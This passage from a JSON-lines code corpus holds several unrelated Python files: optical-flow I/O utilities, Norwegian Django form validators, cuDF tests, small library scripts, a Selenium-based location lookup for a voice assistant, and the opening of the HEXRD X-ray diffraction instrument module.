file.readline())\n if dim_match:\n width, height = map(int, dim_match.groups())\n else:\n raise Exception(\"Malformed PFM header.\")\n\n scale = float(file.readline().rstrip())\n if scale < 0: # little-endian\n endian = \"<\"\n scale = -scale\n else:\n endian = \">\" # big-endian\n\n data = np.fromfile(file, endian + \"f\")\n shape = (height, width, 3) if color else (height, width)\n\n data = np.reshape(data, shape)\n data = np.flipud(data)\n\n return data\n\n\ndef read_flow_png(filename):\n \"\"\"\n Read optical flow from a png file.\n\n Parameters\n -----------\n filename : str\n Path to flow file\n\n Returns\n --------\n flow : np.ndarray\n Optical flow map\n\n valid : np.ndarray\n Valid flow map\n \"\"\"\n flow = cv2.imread(filename, cv2.IMREAD_ANYDEPTH | cv2.IMREAD_COLOR)\n flow = flow[:, :, ::-1].astype(np.float32)\n flow, valid = flow[:, :, :2], flow[:, :, 2]\n flow = (flow - 2**15) / 64.0\n return flow, valid\n\n\ndef write_flow(filename, uv, v=None):\n \"\"\"Write optical flow to file.\n\n If v is None, uv is assumed to contain both u and v channels,\n stacked in depth.\n\n Parameters\n ----------\n filename : str\n Path to file\n uv : np.ndarray\n 
Optical flow\n v : np.ndarray, optional\n Optional second channel\n \"\"\"\n\n # Original code by Deqing Sun, adapted from Daniel Scharstein.\n\n n_bands = 2\n\n if v is None:\n assert uv.ndim == 3\n assert uv.shape[2] == 2\n u = uv[:, :, 0]\n v = uv[:, :, 1]\n else:\n u = uv\n\n assert u.shape == v.shape\n height, width = u.shape\n f = open(filename, \"wb\")\n # write the header\n f.write(TAG_CHAR)\n np.array(width).astype(np.int32).tofile(f)\n np.array(height).astype(np.int32).tofile(f)\n # arrange into matrix form\n tmp = np.zeros((height, width * n_bands))\n tmp[:, np.arange(width) * 2] = u\n tmp[:, np.arange(width) * 2 + 1] = v\n tmp.astype(np.float32).tofile(f)\n f.close()\n\n\ndef read_image(file_name):\n \"\"\"\n Read images from a variety of file formats\n\n Parameters\n -----------\n file_name : str\n Path to flow file\n\n Returns\n --------\n flow : np.ndarray\n Optical flow map\n \"\"\"\n\n ext = splitext(file_name)[-1]\n\n if ext == \".png\" or ext == \".jpeg\" or ext == \".ppm\" or ext == \".jpg\":\n return Image.open(file_name)\n\n elif ext == \".bin\" or ext == \".raw\":\n return np.load(file_name)\n\n return []\n\n\ndef read_flow(file_name):\n \"\"\"\n Read ground truth flow from a variety of file formats\n\n Parameters\n -----------\n file_name : str\n Path to flow file\n\n Returns\n --------\n flow : np.ndarray\n Optical flow map\n\n valid : None if .flo and .pfm files else np.ndarray\n Valid flow map\n \"\"\"\n\n ext = splitext(file_name)[-1]\n\n if ext == \".flo\":\n flow = read_flow_middlebury(file_name).astype(np.float32)\n return flow, None\n\n elif ext == \".pfm\":\n\n flow = read_flow_pfm(file_name).astype(np.float32)\n\n if len(flow.shape) == 2:\n return flow, None\n else:\n return flow[:, :, :-1], None\n\n elif ext == \".png\":\n return read_flow_png(file_name)\n\n return []\n\n\nclass InputPadder:\n \"\"\"\n Class to pad / unpad the input to a network with a given padding\n\n Parameters\n -----------\n dims : tuple\n Dimensions of the input\n divisor : int\n Divisor to make the input evenly divisible by\n mode : str\n Padding mode\n \"\"\"\n\n def __init__(self, dims, divisor=8, mode=\"sintel\"):\n\n self.ht, self.wd = dims[-2:]\n pad_ht = (((self.ht // divisor) + 1) * divisor - self.ht) % divisor\n pad_wd = (((self.wd // divisor) + 1) * divisor - self.wd) % divisor\n\n if mode == \"sintel\":\n self._pad = [\n pad_wd // 2,\n pad_wd - pad_wd // 2,\n pad_ht // 2,\n pad_ht - pad_ht // 2,\n ]\n else:\n self._pad = [pad_wd // 2, pad_wd - pad_wd // 2, 0, pad_ht]\n\n def pad(self, *inputs):\n \"\"\"\n Pad the input\n\n Parameters\n -----------\n inputs : list\n List of inputs to pad\n\n Returns\n --------\n list\n Padded inputs\n \"\"\"\n\n return [F.pad(x, self._pad, mode=\"replicate\") for x in inputs]\n\n def unpad(self, x):\n \"\"\"\n Unpad the input\n\n Parameters\n -----------\n x : torch.Tensor\n Input to unpad\n\n Returns\n --------\n torch.Tensor\n Unpadded input\n \"\"\"\n\n ht, wd = x.shape[-2:]\n c = [self._pad[2], ht - self._pad[3], self._pad[0], wd - self._pad[1]]\n\n return x[..., c[0] : c[1], c[2] : c[3]]\n"} {"ext": "py", "sha": "1a302273664eae240f4d94c2a86f0229ee564ceb", "content": "\"\"\"Norwegian-specific Form helpers.\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport datetime\nimport re\n\nfrom django.core.validators import EMPTY_VALUES\nfrom django.forms import ValidationError\nfrom django.forms.fields import CharField, Field, RegexField, Select\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom localflavor.generic.forms 
import DeprecatedPhoneNumberFormFieldMixin\n\nfrom .no_municipalities import MUNICIPALITY_CHOICES\n\n\nclass NOZipCodeField(RegexField):\n \"\"\"\n A form field that validates input as a Norwegian zip code.\n\n Valid codes have four digits.\n \"\"\"\n\n default_error_messages = {\n 'invalid': _('Enter a zip code in the format XXXX.'),\n }\n\n def __init__(self, max_length=None, min_length=None, *args, **kwargs):\n super(NOZipCodeField, self).__init__(r'^\\d{4}$',\n max_length, min_length, *args, **kwargs)\n\n\nclass NOMunicipalitySelect(Select):\n \"\"\"A Select widget that uses a list of Norwegian municipalities (fylker) as its choices.\"\"\"\n\n def __init__(self, attrs=None):\n super(NOMunicipalitySelect, self).__init__(attrs, choices=MUNICIPALITY_CHOICES)\n\n\nclass NOSocialSecurityNumber(Field):\n \"\"\"Algorithm is documented at http://no.wikipedia.org/wiki/Personnummer.\"\"\"\n\n default_error_messages = {\n 'invalid': _('Enter a valid Norwegian social security number.'),\n }\n\n def clean(self, value):\n super(NOSocialSecurityNumber, self).clean(value)\n if value in EMPTY_VALUES:\n return ''\n\n if not re.match(r'^\\d{11}$', value):\n raise ValidationError(self.error_messages['invalid'])\n\n self.birthday = self._get_birthday(value)\n self.gender = self._get_gender(value)\n\n digits = map(int, list(value))\n weight_1 = [3, 7, 6, 1, 8, 9, 4, 5, 2, 1, 0]\n weight_2 = [5, 4, 3, 2, 7, 6, 5, 4, 3, 2, 1]\n\n def multiply_reduce(aval, bval):\n return sum([(a * b) for (a, b) in zip(aval, bval)])\n\n if multiply_reduce(digits, weight_1) % 11 != 0:\n raise ValidationError(self.error_messages['invalid'])\n if multiply_reduce(digits, weight_2) % 11 != 0:\n raise ValidationError(self.error_messages['invalid'])\n\n return value\n\n def _get_gender(self, value):\n sexnum = int(value[8])\n if sexnum % 2 == 0:\n gender = 'F'\n else:\n gender = 'M'\n return gender\n\n def _get_birthday(self, value):\n birthday = None\n day = int(value[:2])\n month = int(value[2:4])\n year2 = int(value[4:6])\n inum = int(value[6:9])\n try:\n if 000 <= inum < 500:\n birthday = datetime.date(1900 + year2, month, day)\n if 500 <= inum < 750 and year2 > 54:\n birthday = datetime.date(1800 + year2, month, day)\n if 500 <= inum < 1000 and year2 < 40:\n birthday = datetime.date(2000 + year2, month, day)\n if 900 <= inum < 1000 and year2 > 39:\n birthday = datetime.date(1900 + year2, month, day)\n except ValueError:\n raise ValidationError(self.error_messages['invalid'])\n return birthday\n\n\nclass NOBankAccountNumber(CharField):\n \"\"\"\n A form field for Norwegian bank account numbers.\n\n Performs MOD11 with the custom weights for the Norwegian bank account numbers,\n including a check for a remainder of 0, in which event the checksum is also 0.\n\n Usually their string representation is along the lines of ZZZZ.YY.XXXXX, where the last X is the check digit.\n They're always a total of 11 digits long, with 10 out of these 11 being the actual account number itself.\n\n * Accepts, and strips, account numbers with extra spaces.\n * Accepts, and strips, account numbers provided in form of XXXX.YY.XXXXX.\n\n .. note:: No consideration is taking for banking clearing numbers as of yet, seeing as these are only used between\n banks themselves.\n\n .. versionadded:: 1.5\n \"\"\"\n\n default_error_messages = {\n 'invalid': _('Enter a valid Norwegian bank account number.'),\n 'invalid_checksum': _('Invalid control digit. Enter a valid Norwegian bank account number.'),\n 'invalid_length': _('Invalid length. 
Norwegian bank account numbers are 11 digits long.'),\n }\n\n def validate(self, value):\n super(NOBankAccountNumber, self).validate(value)\n\n if value is '':\n # It's alright to be empty.\n return\n elif not value.isdigit():\n # You must only contain decimals.\n raise ValidationError(self.error_messages['invalid'])\n elif len(value) is not 11:\n # They only have one length: the number is 10!\n # That being said, you always store them with the check digit included, so 11.\n raise ValidationError(self.error_messages['invalid_length'])\n\n # The control/check digit is the last digit\n check_digit = int(value[-1])\n bank_number = value[:-1]\n\n # These are the weights by which we multiply to get our checksum digit\n weights = [5, 4, 3, 2, 7, 6, 5, 4, 3, 2]\n result = sum(w * (int(x)) for w, x in zip(weights, bank_number))\n remainder = result % 11\n # The checksum is 0 in the event there's no remainder, seeing as we cannot have a checksum of 11\n # when 11 is one digit longer than we've got room for\n checksum = 0 if remainder is 0 else 11 - remainder\n\n if checksum != check_digit:\n raise ValidationError(self.error_messages['invalid_checksum'])\n\n def to_python(self, value):\n value = super(NOBankAccountNumber, self).to_python(value)\n return value.replace('.', '').replace(' ', '')\n\n def prepare_value(self, value):\n if value in EMPTY_VALUES:\n return value\n return '{}.{}.{}'.format(value[0:4], value[4:6], value[6:11])\n\n\nclass NOPhoneNumberField(RegexField, DeprecatedPhoneNumberFormFieldMixin):\n \"\"\"\n Field with phonenumber validation.\n\n Requires a phone number with 8 digits and optional country code\n \"\"\"\n\n default_error_messages = {\n 'invalid': _('A phone number must be 8 digits and may have country code'),\n }\n\n def __init__(self, max_length=None, min_length=None, *args, **kwargs):\n super(NOPhoneNumberField, self).__init__(\n r'^(?:\\+47)? 
?(\\d{3}\\s?\\d{2}\\s?\\d{3}|\\d{2}\\s?\\d{2}\\s?\\d{2}\\s?\\d{2})$',\n max_length, min_length, *args, **kwargs)\n"} {"ext": "py", "sha": "1a30237343fbc293756aaa70da110dd64c11e79d", "content": "from __future__ import division, print_function\n\nimport numpy as np\n\nfrom librmm_cffi import librmm as rmm\n\nimport cudf._lib as libcudf\nfrom cudf.core import Series\nfrom cudf.core.column import column\n\n\ndef test_gather_single_col():\n col = column.as_column(np.arange(100), dtype=np.int32)\n gather_map = np.array([0, 1, 2, 3, 5, 8, 13, 21], dtype=np.int32)\n\n device_gather_map = rmm.to_device(gather_map)\n\n out = libcudf.copying.gather(col, device_gather_map)\n\n np.testing.assert_array_equal(out.to_array(), gather_map)\n\n\ndef test_gather_cols():\n cols = [\n column.as_column(np.arange(10), dtype=np.int32),\n column.as_column(np.arange(0.0, 2.0, 0.2), dtype=np.float32),\n ]\n gather_map = np.array([0, 1, 2, 3, 5, 8], dtype=np.int32)\n\n expected = np.array(gather_map * 0.2, dtype=np.float32)\n\n device_gather_map = rmm.to_device(gather_map)\n\n out = libcudf.copying.gather(cols, device_gather_map)\n\n np.testing.assert_array_equal(out[0].to_array(), gather_map)\n np.testing.assert_array_almost_equal(out[1].to_array(), expected)\n\n\ndef test_gather_string_col():\n col = column.as_column([\"a\", \"b\", \"c\", \"d\"])\n gather_map = column.as_column([0, 2, 3], dtype=\"int32\").data.mem\n result = libcudf.copying.gather(col, gather_map)\n assert result.data.to_host() == [\"a\", \"c\", \"d\"]\n\n col = column.as_column([\"a\", \"b\", None, \"d\"])\n gather_map = column.as_column([0, 2, 3], dtype=\"int32\").data.mem\n result = libcudf.copying.gather(col, gather_map)\n assert result.data.to_host() == [\"a\", None, \"d\"]\n\n\ndef test_null_copy():\n col = Series(np.arange(2049))\n col[:] = None\n assert len(col) == 2049\n"} {"ext": "py", "sha": "1a302539f41176b68fc899c25e0f9d2336eec703", "content": "#!/usr/bin/env python\n\nfrom PyZ3950 import zoom\n\ndef run ():\n conn = zoom.Connection ('amicus.nlc-bnc.ca', 210)\n conn.databaseName = 'NL'\n q = zoom.Query ('CCL', 'ti=\"1066\"')\n ss = conn.scan (q)\n for s in ss[0:10]:\n print s\n \n\nif __name__ == '__main__':\n run ()\n"} {"ext": "py", "sha": "1a30266b5b34e7e07dd8b5ba15729b82ce3d31de", "content": "import sys,os,random\nfrom phrasemachine import phrasemachine as pm; reload(pm)\ntext=open(\"sloths.txt\").read()\n# text = open(\"testdata/wine-nltk.txt\").read().decode(\"utf8\",'ignore')\n# tt=pm.get_stdeng_spacy_tagger()\nd=tt.tag_text(text)\n\ndef loop():\n while True:\n pat = raw_input(\"Pattern: \")\n # p = pm.get_phrases(tokens=d['tokens'], postags=d['pos'], regex=pat, minlen=1)['counts']\n p = pm.get_phrases(open(\"sloths.txt\").read(), tagger='spacy', regex=pat, minlen=1)['counts']\n phrases = p.keys()\n ptok = []\n for phrase in phrases:\n # print [phrase]\n ptok += [phrase]*p[phrase]\n if len(ptok) < 10:\n xx = ptok\n else:\n xx = [random.choice(ptok) for i in xrange(10)]\n # xx = [random.choice(phrases) for i in xrange(10)]\n # print xx\n print u', '.join(xx).encode(\"utf8\")\n\n\n"} {"ext": "py", "sha": "1a3026e7f45b00b8eb123506ce710f31ae1ad3e4", "content": "from .Function_Module import Function_Module\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nimport selenium\r\nfrom geopy.geocoders import Nominatim\r\nimport time\r\nimport os\r\nimport pathlib\r\n\r\nclass get_gps_location(Function_Module):\r\n name = 
\"get_gps_location\"\r\n help_description = \"Current location\"\r\n\r\n time_sleep = 2\r\n error = \"Sir, I'm sorry I can't get my location.\"\r\n chrome_not_found_error = \"Sir, I can't find the Chrome binaries. Make sure that C:\\Program Files(x86)\\Google\\Chrome\\Application\\chrome.exe is present!\"\r\n\r\n def respond(self, entities):\r\n try:\r\n coordinates = self.getLocation(self)\r\n return self.convert_to_location(self, coordinates)\r\n except selenium.common.exceptions.WebDriverException:\r\n return self.chrome_not_found_error\r\n except:\r\n return self.error\r\n\r\n def getLocation(self):\r\n chrome_options = Options()\r\n chrome_options.add_argument(\"--use-fake-ui-for-media-stream\")\r\n # You shouldn't see the browser, so; headless does not work, otherwise gps will not be activated!\r\n # chrome_options.add_argument (\"headless\")\r\n\r\n timeout = 20\r\n\r\n # The directory in which the Chrome driver (required for Selenium) is located: Is the script directory, i.e. the same\r\n chrome_driver_path = str( str( pathlib.Path(__file__).parent.absolute() ) + r\"\\chromedriver.exe\" )\r\n print(\"Chrome-Driver Path: \", chrome_driver_path)\r\n\r\n driver = webdriver.Chrome(executable_path=chrome_driver_path, chrome_options=chrome_options)\r\n driver.get(\"https://mycurrentlocation.net/\")\r\n wait = WebDriverWait(driver, timeout)\r\n time.sleep(self.time_sleep)\r\n\r\n longitude = driver.find_elements_by_xpath('//*[@id=\"longitude\"]')\r\n longitude = [x.text for x in longitude]\r\n longitude = str(longitude[0])\r\n latitude = driver.find_elements_by_xpath('//*[@id=\"latitude\"]')\r\n latitude = [x.text for x in latitude]\r\n latitude = str(latitude[0])\r\n driver.quit()\r\n\r\n coordinates = [latitude, longitude]\r\n return coordinates\r\n\r\n def convert_to_location(self, coordinates):\r\n geolocator = Nominatim(user_agent=\"F.R.I.D.A.Y\")\r\n location = geolocator.reverse(coordinates[0] + ',' + coordinates[1])\r\n\r\n print(location.raw)\r\n\r\n # Compose an answer text from the address\r\n address = location.raw['address']\r\n\r\n # Street with 'the'\r\n if(\"street\" in address['road'] or \"road\" in address['road']):\r\n result = \"According to GPS, you are currently in the \"+ address['road'] + ', ' + address['town'] + ', ' + address['state'] + ', ' + address['country'] + '.'\r\n\r\n else:\r\n result = \"According to GPS, you are currently in \"+ address['road'] + ', ' + address['town'] + ', ' + address['state'] + ', ' + address['country'] + '.'\r\n \r\n return result"} {"ext": "py", "sha": "1a3027db99844428cefed2186cc6eaa24fc7c394", "content": "# -*- coding: utf-8 -*-\n# =============================================================================\n# Copyright (c) 2012, Lawrence Livermore National Security, LLC.\n# Produced at the Lawrence Livermore National Laboratory.\n# Written by Joel Bernier and others.\n# LLNL-CODE-529294.\n# All rights reserved.\n#\n# This file is part of HEXRD. For details on dowloading the source,\n# see the file COPYING.\n#\n# Please also see the file LICENSE.\n#\n# This program is free software; you can redistribute it and/or modify it under\n# the terms of the GNU Lesser General Public License (as published by the Free\n# Software Foundation) version 2.1 dated February 1999.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF MERCHANTABILITY\n# or FITNESS FOR A PARTICULAR PURPOSE. 
See the terms and conditions of the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this program (see file LICENSE); if not, write to\n# the Free Software Foundation, Inc., 59 Temple Place, Suite 330,\n# Boston, MA 02111-1307 USA or visit .\n# =============================================================================\n\"\"\"\nCreated on Fri Dec 9 13:05:27 2016\n\n@author: bernier2\n\"\"\"\nimport copy\nimport os\nfrom concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor\nfrom functools import partial\n\nimport yaml\n\nimport h5py\n\nimport numpy as np\n\nfrom io import IOBase\n\nfrom scipy import ndimage\nfrom scipy.linalg.matfuncs import logm\n\nfrom hexrd import constants\nfrom hexrd.gridutil import cellConnectivity, cellIndices, make_tolerance_grid\nfrom hexrd import matrixutil as mutil\nfrom hexrd.transforms.xfcapi import \\\n anglesToGVec, \\\n angularDifference, \\\n detectorXYToGvec, \\\n gvecToDetectorXY, \\\n makeOscillRotMat, \\\n makeRotMatOfExpMap, \\\n mapAngle, \\\n oscillAnglesOfHKLs, \\\n rowNorm, \\\n unitRowVector\nfrom hexrd import xrdutil\nfrom hexrd.crystallography import PlaneData\nfrom hexrd import constants as ct\nfrom hexrd.rotations import angleAxisOfRotMat, RotMatEuler\nfrom hexrd import distortion as distortion_pkg\nfrom hexrd.utils.compatibility import h5py_read_string\nfrom hexrd.utils.concurrent import distribute_tasks\nfrom hexrd.utils.decorators import memoize\nfrom hexrd.valunits import valWUnit\nfrom hexrd.wppf import LeBail\n\nfrom skimage.draw import polygon\nfrom skimage.util import random_noise\nfrom hexrd.wppf import wppfsupport\n\ntry:\n from fast_histogram import histogram1d\n fast_histogram = True\nexcept(ImportError):\n from numpy import histogram as histogram1d\n fast_histogram = False\n\nif ct.USE_NUMBA:\n import numba\n\n# =============================================================================\n# PARAMETERS\n# =============================================================================\n\ninstrument_name_DFLT = 'instrument'\n\nbeam_energy_DFLT = 65.351\nbeam_vec_DFLT = ct.beam_vec\n\neta_vec_DFLT = ct.eta_vec\n\npanel_id_DFLT = 'generic'\nnrows_DFLT = 2048\nncols_DFLT = 2048\npixel_size_DFLT = (0.2, 0.2)\n\ntilt_params_DFLT = np.zeros(3)\nt_vec_d_DFLT = np.r_[0., 0., -1000.]\n\nchi_DFLT = 0.\nt_vec_s_DFLT = np.zeros(3)\n\nmax_workers_DFLT = max(1, os.cpu_count() - 1)\n\n\"\"\"\nCalibration parameter flags\n\n for instrument level, len is 7\n\n [beam energy,\n beam azimuth,\n beam elevation,\n chi,\n tvec[0],\n tvec[1],\n tvec[2],\n ]\n\"\"\"\ninstr_calibration_flags_DFLT = np.zeros(7, dtype=bool)\n\n\"\"\"\n for each panel, order is:\n\n [tilt[0],\n tilt[1],\n tilt[2],\n tvec[0],\n tvec[1],\n tvec[2],\n ,\n ]\n\n len is 6 + len(dparams) for each panel\n by default, dparams are not set for refinement\n\"\"\"\npanel_calibration_flags_DFLT = np.array(\n [1, 1, 1, 1, 1, 1],\n dtype=bool\n)\n\nbuffer_key = 'buffer'\ndistortion_key = 'distortion'\n\n# =============================================================================\n# UTILITY METHODS\n# =============================================================================\n\n\ndef _fix_indices(idx, lo, hi):\n nidx = np.array(idx)\n off_lo = nidx < lo\n off_hi = nidx > hi\n nidx[off_lo] = lo\n nidx[off_hi] = hi\n return nidx\n\n\ndef calc_beam_vec(azim, pola):\n \"\"\"\n Calculate unit beam propagation vector from\n spherical coordinate spec in DEGREES.\n\n ...MAY CHANGE; THIS IS 
ALSO LOCATED IN XRDUTIL!\n \"\"\"\n tht = np.radians(azim)\n phi = np.radians(pola)\n bv = np.r_[\n np.sin(phi)*np.cos(tht),\n np.cos(phi),\n np.sin(phi)*np.sin(tht)]\n return -bv\n\n\ndef calc_angles_from_beam_vec(bvec):\n \"\"\"\n Return the azimuth and polar angle from a beam\n vector\n \"\"\"\n bvec = np.atleast_1d(bvec).flatten()\n nvec = unitRowVector(-bvec)\n azim = float(\n np.degrees(np.arctan2(nvec[2], nvec[0]))\n )\n pola = float(np.degrees(np.arccos(nvec[1])))\n return azim, pola\n\n\ndef migrate_instrument_config(instrument_config):\n \"\"\"utility function to generate old instrument config dictionary\"\"\"\n cfg_list = []\n for detector_id in instrument_config['detectors']:\n cfg_list.append(\n dict(\n detector=instrument_config['detectors'][detector_id],\n oscillation_stage=instrument_config['oscillation_stage'],\n )\n )\n return cfg_list\n\n\ndef angle_in_range(angle, ranges, ccw=True, units='degrees'):\n \"\"\"\n Return the index of the first wedge the angle is found in\n\n WARNING: always clockwise; assumes wedges are not overlapping\n \"\"\"\n tau = 360.\n if units.lower() == 'radians':\n tau = 2*np.pi\n w = np.nan\n for i, wedge in enumerate(ranges):\n amin = wedge[0]\n amax = wedge[1]\n check = amin + np.mod(angle - amin, tau)\n if check < amax:\n w = i\n break\n return w\n\n\n# ???: move to gridutil?\ndef centers_of_edge_vec(edges):\n assert np.r_[edges].ndim == 1, \"edges must be 1-d\"\n return np.average(np.vstack([edges[:-1], edges[1:]]), axis=0)\n\n\ndef max_tth(instr):\n \"\"\"\n Return the maximum Bragg angle (in radians) subtended by the instrument.\n\n Parameters\n ----------\n instr : hexrd.instrument.HEDMInstrument instance\n the instrument class to evalutate.\n\n Returns\n -------\n tth_max : float\n The maximum observable Bragg angle by the instrument in radians.\n \"\"\"\n tth_max = 0.\n for det in instr.detectors.values():\n ptth, peta = det.pixel_angles()\n tth_max = max(np.max(ptth), tth_max)\n return tth_max\n\n\ndef pixel_resolution(instr):\n \"\"\"\n Return the minimum, median, and maximum angular\n resolution of the instrument.\n\n Parameters\n ----------\n instr : HEDMInstrument instance\n An instrument.\n\n Returns\n -------\n tth_stats : float\n min/median/max tth resolution in radians.\n eta_stats : TYPE\n min/median/max eta resolution in radians.\n\n \"\"\"\n max_tth = np.inf\n max_eta = np.inf\n min_tth = -np.inf\n min_eta = -np.inf\n ang_ps_full = []\n for panel in instr.detectors.values():\n angps = panel.angularPixelSize(\n np.stack(\n panel.pixel_coords,\n axis=0\n ).reshape(2, np.cumprod(panel.shape)[-1]).T\n )\n ang_ps_full.append(angps)\n max_tth = min(max_tth, np.min(angps[:, 0]))\n max_eta = min(max_eta, np.min(angps[:, 1]))\n min_tth = max(min_tth, np.max(angps[:, 0]))\n min_eta = max(min_eta, np.max(angps[:, 1]))\n pass\n med_tth, med_eta = np.median(np.vstack(ang_ps_full), axis=0).flatten()\n return (min_tth, med_tth, max_tth), (min_eta, med_eta, max_eta)\n\n\ndef max_resolution(instr):\n \"\"\"\n Return the maximum angular resolution of the instrument.\n\n Parameters\n ----------\n instr : HEDMInstrument instance\n An instrument.\n\n Returns\n -------\n max_tth : float\n Maximum tth resolution in radians.\n max_eta : TYPE\n maximum eta resolution in radians.\n\n \"\"\"\n max_tth = np.inf\n max_eta = np.inf\n for panel in instr.detectors.values():\n angps = panel.angularPixelSize(\n np.stack(\n panel.pixel_coords,\n axis=0\n ).reshape(2, np.cumprod(panel.shape)[-1]).T\n )\n max_tth = min(max_tth, np.min(angps[:, 0]))\n max_eta = 
min(max_eta, np.min(angps[:, 1]))\n return max_tth, max_eta\n\n\ndef _gaussian_dist(x, cen, fwhm):\n sigm = fwhm/(2*np.sqrt(2*np.log(2)))\n return np.exp(-0.5*(x - cen)**2/sigm**2)\n\n\ndef _sigma_to_fwhm(sigm):\n return sigm*ct.sigma_to_fwhm\n\n\ndef _fwhm_to_sigma(fwhm):\n return fwhm/ct.sigma_to_fwhm\n\n\n# FIXME find a better place for this, and maybe include loop over pixels\nif ct.USE_NUMBA:\n @numba.njit(nogil=True, cache=True)\n def _solid_angle_of_triangle(vtx_list):\n norms = np.sqrt(np.sum(vtx_list*vtx_list, axis=1))\n norms_prod = norms[0] * norms[1] * norms[2]\n scalar_triple_product = np.dot(vtx_list[0],\n np.cross(vtx_list[2], vtx_list[1]))\n denominator = norms_prod \\\n + norms[0]*np.dot(vtx_list[1], vtx_list[2]) \\\n + norms[1]*np.dot(vtx_list[2], vtx_list[0]) \\\n + norms[2]*np.dot(vtx_list[0], vtx_list[1])\n\n return 2.*np.arctan2(scalar_triple_product, denominator)\nelse:\n def _solid_angle_of_triangle(vtx_list):\n norms = rowNorm(vtx_list)\n norms_prod = np.cumprod(norms)[-1]\n scalar_triple_product = np.dot(vtx_list[0],\n np.cross(vtx_list[2], vtx_list[1]))\n denominator = norms_prod \\\n + norms[0]*np.dot(vtx_list[1], vtx_list[2]) \\\n + norms[1]*np.dot(vtx_list[2], vtx_list[0]) \\\n + norms[2]*np.dot(vtx_list[0], vtx_list[1])\n\n return 2.*np.arctan2(scalar_triple_product, denominator)\n\n# =============================================================================\n# CLASSES\n# =============================================================================\n\n\nclass HEDMInstrument(object):\n \"\"\"\n Abstraction of XRD instrument.\n\n * Distortion needs to be moved to a class with registry; tuple unworkable\n * where should reference eta be defined? currently set to default config\n \"\"\"\n\n def __init__(self, instrument_config=None,\n image_series=None, eta_vector=None,\n instrument_name=None, tilt_calibration_mapping=None,\n max_workers=max_workers_DFLT):\n self._id = instrument_name_DFLT\n\n if eta_vector is None:\n self._eta_vector = eta_vec_DFLT\n else:\n self._eta_vector = eta_vector\n\n self.max_workers = max_workers\n\n if instrument_config is None:\n if instrument_name is not None:\n self._id = instrument_name\n self._num_panels = 1\n self._beam_energy = beam_energy_DFLT\n self._beam_vector = beam_vec_DFLT\n\n self._detectors = dict(\n panel_id_DFLT=PlanarDetector(\n rows=nrows_DFLT, cols=ncols_DFLT,\n pixel_size=pixel_size_DFLT,\n tvec=t_vec_d_DFLT,\n tilt=tilt_params_DFLT,\n bvec=self._beam_vector,\n evec=self._eta_vector,\n distortion=None,\n max_workers=self.max_workers),\n )\n\n self._tvec = t_vec_s_DFLT\n self._chi = chi_DFLT\n else:\n if isinstance(instrument_config, h5py.File):\n tmp = {}\n unwrap_h5_to_dict(instrument_config, tmp)\n instrument_config.close()\n instrument_config = tmp['instrument']\n elif not isinstance(instrument_config, dict):\n raise RuntimeError(\n \"instrument_config must be either an HDF5 file object\"\n + \"or a dictionary. 
You gave a %s\"\n % type(instrument_config)\n )\n if instrument_name is None:\n if 'id' in instrument_config:\n self._id = instrument_config['id']\n else:\n self._id = instrument_name\n self._num_panels = len(instrument_config['detectors'])\n self._beam_energy = instrument_config['beam']['energy'] # keV\n self._beam_vector = calc_beam_vec(\n instrument_config['beam']['vector']['azimuth'],\n instrument_config['beam']['vector']['polar_angle'],\n )\n\n # now build detector dict\n detectors_config = instrument_config['detectors']\n det_dict = dict.fromkeys(detectors_config)\n for det_id, det_info in detectors_config.items():\n pixel_info = det_info['pixels']\n affine_info = det_info['transform']\n try:\n saturation_level = det_info['saturation_level']\n except(KeyError):\n saturation_level = 2**16\n shape = (pixel_info['rows'], pixel_info['columns'])\n\n panel_buffer = None\n if buffer_key in det_info:\n det_buffer = det_info[buffer_key]\n if det_buffer is not None:\n if isinstance(det_buffer, np.ndarray):\n if det_buffer.ndim == 2:\n assert det_buffer.shape == shape, \\\n \"buffer shape must match detector\"\n else:\n assert len(det_buffer) == 2\n panel_buffer = det_buffer\n elif isinstance(det_buffer, list):\n panel_buffer = np.asarray(det_buffer)\n elif np.isscalar(det_buffer):\n panel_buffer = det_buffer*np.ones(2)\n else:\n raise RuntimeError(\n \"panel buffer spec invalid for %s\" % det_id\n )\n\n # handle distortion\n distortion = None\n if distortion_key in det_info:\n distortion_cfg = det_info[distortion_key]\n if distortion_cfg is not None:\n try:\n func_name = distortion_cfg['function_name']\n dparams = distortion_cfg['parameters']\n distortion = distortion_pkg.get_mapping(\n func_name, dparams\n )\n except(KeyError):\n raise RuntimeError(\n \"problem with distortion specification\"\n )\n\n det_dict[det_id] = PlanarDetector(\n name=det_id,\n rows=pixel_info['rows'],\n cols=pixel_info['columns'],\n pixel_size=pixel_info['size'],\n panel_buffer=panel_buffer,\n saturation_level=saturation_level,\n tvec=affine_info['translation'],\n tilt=affine_info['tilt'],\n bvec=self._beam_vector,\n evec=self._eta_vector,\n distortion=distortion,\n max_workers=self.max_workers)\n\n self._detectors = det_dict\n\n self._tvec = np.r_[\n instrument_config['oscillation_stage']['translation']\n ]\n self._chi = instrument_config['oscillation_stage']['chi']\n\n #\n # set up calibration parameter list and refinement flags\n #\n # first, grab the mapping function for tilt parameters if specified\n if tilt_calibration_mapping is not None:\n if not isinstance(tilt_calibration_mapping, RotMatEuler):\n raise RuntimeError(\n \"tilt mapping must be a 'RotMatEuler' instance\"\n )\n self._tilt_calibration_mapping = tilt_calibration_mapping\n\n # grab angles from beam vec\n # !!! 
these are in DEGREES!\n azim, pola = calc_angles_from_beam_vec(self._beam_vector)\n\n # stack instrument level parameters\n # units: keV, degrees, mm\n self._calibration_parameters = [\n self._beam_energy,\n azim,\n pola,\n np.degrees(self._chi),\n *self._tvec,\n ]\n self._calibration_flags = instr_calibration_flags_DFLT\n\n # collect info from panels and append\n det_params = []\n det_flags = []\n for detector in self._detectors.values():\n this_det_params = detector.calibration_parameters\n if self._tilt_calibration_mapping is not None:\n rmat = makeRotMatOfExpMap(detector.tilt)\n self._tilt_calibration_mapping.rmat = rmat\n tilt = np.degrees(self._tilt_calibration_mapping.angles)\n this_det_params[:3] = tilt\n det_params.append(this_det_params)\n det_flags.append(detector.calibration_flags)\n det_params = np.hstack(det_params)\n det_flags = np.hstack(det_flags)\n\n # !!! hstack here assumes that calib params will be float and\n # !!! flags will all be 